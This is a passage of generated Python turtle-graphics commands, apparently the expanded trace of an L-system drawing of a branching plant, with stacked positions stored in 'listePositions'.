pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((243.51,337.45)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((212.73,331.32), 22.5), ((243.51,337.45), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((243.51,337.45)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((212.73,331.32), 22.5), ((254.83,348.76), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((254.83,348.76)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((212.73,331.32), 22.5), ((254.83,348.76), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((254.83,348.76)), setheading(45.0) ;
pu(), setposition((212.73,331.32)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((212.73,331.32), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((212.73,331.32), 45.0), ((218.85,346.11), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((218.85,346.11)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((212.73,331.32), 45.0), ((218.85,346.11), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((218.85,346.11)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((212.73,331.32), 45.0), ((230.17,357.42), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((230.17,357.42)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((212.73,331.32), 45.0), ((230.17,357.42), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((230.17,357.42)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((212.73,331.32), 45.0), ((244.95,363.54), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((244.95,363.54)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((212.73,331.32), 45.0), ((244.95,363.54), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((244.95,363.54)), setheading(22.5) ;
pu(), setposition((212.73,331.32)), setheading(45.0) ;
pu(), setposition((177.86,247.13)), setheading(67.5) ;
pu(), setposition((48.98,118.26)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,134.26), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,134.26)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,134.26), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,134.26)), setheading(90.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,150.26)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,150.26)), setheading(90.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 67.5), ((60.30,161.57), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((60.30,161.57)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 67.5), ((60.30,161.57), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((60.30,161.57)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 67.5), ((66.42,176.35), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((66.42,176.35)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 67.5), ((66.42,176.35), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((66.42,176.35)), setheading(67.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 67.5), ((66.42,192.35), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((66.42,192.35)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 67.5), ((66.42,192.35), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((66.42,192.35)), setheading(90.0) ;
pu(), setposition((48.98,150.26)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 90.0), ((42.86,165.04), 90.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,165.04)), setheading(90.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 90.0), ((42.86,165.04), 112.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,165.04)), setheading(112.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 90.0), ((42.86,181.04), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,181.04)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 90.0), ((42.86,181.04), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,181.04)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 90.0), ((48.98,195.82), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,195.82)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 90.0), ((48.98,195.82), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,195.82)), setheading(67.5) ;
pu(), setposition((48.98,150.26)), setheading(90.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,166.26), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,166.26)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,166.26), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,166.26)), setheading(90.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,182.26)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,182.26)), setheading(90.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((60.30,193.57), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((60.30,193.57)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((60.30,193.57), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((60.30,193.57)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((66.42,208.35), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((66.42,208.35)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((66.42,208.35), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((66.42,208.35)), setheading(67.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((66.42,224.35), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((66.42,224.35)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((66.42,224.35), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((66.42,224.35)), setheading(90.0) ;
pu(), setposition((48.98,182.26)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((42.86,197.04), 90.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,197.04)), setheading(90.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((42.86,197.04), 112.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,197.04)), setheading(112.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((42.86,213.04), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,213.04)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((42.86,213.04), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,213.04)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,227.82), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,227.82)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,227.82), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,227.82)), setheading(67.5) ;
pu(), setposition((48.98,182.26)), setheading(90.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((60.30,193.57), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((60.30,193.57)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((60.30,193.57), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((60.30,193.57)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((71.61,204.88), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((71.61,204.88)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((71.61,204.88), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((71.61,204.88)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((71.61,204.88), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((71.61,204.88), 22.5), ((87.61,204.88), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((87.61,204.88)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((71.61,204.88), 22.5), ((87.61,204.88), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((87.61,204.88)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((71.61,204.88), 22.5), ((102.39,211.01), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((102.39,211.01)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((71.61,204.88), 22.5), ((102.39,211.01), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((102.39,211.01)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((71.61,204.88), 22.5), ((113.71,222.32), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((113.71,222.32)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((71.61,204.88), 22.5), ((113.71,222.32), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((113.71,222.32)), setheading(45.0) ;
pu(), setposition((71.61,204.88)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((71.61,204.88), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((71.61,204.88), 45.0), ((77.73,219.67), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((77.73,219.67)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((71.61,204.88), 45.0), ((77.73,219.67), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((77.73,219.67)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((71.61,204.88), 45.0), ((89.05,230.98), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((89.05,230.98)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((71.61,204.88), 45.0), ((89.05,230.98), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((89.05,230.98)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((71.61,204.88), 45.0), ((103.83,237.10), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((103.83,237.10)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((71.61,204.88), 45.0), ((103.83,237.10), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((103.83,237.10)), setheading(22.5) ;
pu(), setposition((71.61,204.88)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((77.73,219.67), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((77.73,219.67)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((77.73,219.67), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((77.73,219.67)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,234.45), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((83.86,234.45)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,234.45), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((83.86,234.45)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,234.45), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,234.45), 45.0), ((98.64,240.57), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((98.64,240.57)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,234.45), 45.0), ((98.64,240.57), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((98.64,240.57)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,234.45), 45.0), ((109.95,251.88), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((109.95,251.88)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,234.45), 45.0), ((109.95,251.88), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((109.95,251.88)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,234.45), 45.0), ((116.08,266.67), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((116.08,266.67)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,234.45), 45.0), ((116.08,266.67), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((116.08,266.67)), setheading(67.5) ;
pu(), setposition((83.86,234.45)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,234.45), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,234.45), 67.5), ((83.86,250.45), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((83.86,250.45)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,234.45), 67.5), ((83.86,250.45), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((83.86,250.45)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,234.45), 67.5), ((89.98,265.23), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((89.98,265.23)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,234.45), 67.5), ((89.98,265.23), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((89.98,265.23)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,234.45), 67.5), ((101.29,276.54), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((101.29,276.54)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,234.45), 67.5), ((101.29,276.54), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((101.29,276.54)), setheading(45.0) ;
pu(), setposition((83.86,234.45)), setheading(67.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,250.45), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((83.86,250.45)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,250.45), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((83.86,250.45)), setheading(90.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,266.45), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((83.86,266.45)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,266.45), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
